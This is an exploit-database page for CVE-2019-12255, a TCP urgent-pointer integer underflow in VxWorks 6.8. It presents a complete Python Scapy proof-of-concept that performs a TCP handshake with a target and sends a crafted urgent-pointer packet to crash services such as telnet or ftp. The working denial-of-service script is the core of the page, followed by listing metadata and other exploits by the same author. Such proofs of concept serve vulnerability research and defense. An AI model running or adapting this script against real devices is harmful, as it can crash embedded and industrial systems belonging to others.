Menu

Search for hundreds of thousands of exploits

"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow"

Author

"Zhou Yu"

Platform

vxworks

Release date

2019-08-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.

from scapy.all import *

if __name__ == "__main__":
    ip = "192.168.10.199"
    dport = 23
    seq_num = 1000
    payload = "\x42"*2000
    sport = random.randint(1024,65535)

    syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
    syn_ack = sr1(syn)

    seq_num = seq_num + 1
    ack_num = syn_ack.seq+1
    ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
    send(ack)

    psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
    send(psh)
Release Date Title Type Platform Author
2019-08-12 "VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow" dos vxworks "Zhou Yu"
Release Date Title Type Platform Author
2019-08-12 "VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow" dos vxworks "Zhou Yu"
2016-04-13 "Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload" webapps jsp "Zhou Yu"
2016-07-07 "GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation" local windows "Zhou Yu"
2016-11-18 "Moxa SoftCMS 1.5 - Denial of Service (PoC)" dos windows "Zhou Yu"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47233/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47233/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47233/41594/vxworks-68-tcp-urgent-pointer-0-integer-underflow/download/", "exploit_id": "47233", "exploit_description": "\"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow\"", "exploit_date": "2019-08-12", "exploit_author": "\"Zhou Yu\"", "exploit_type": "dos", "exploit_platform": "vxworks", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse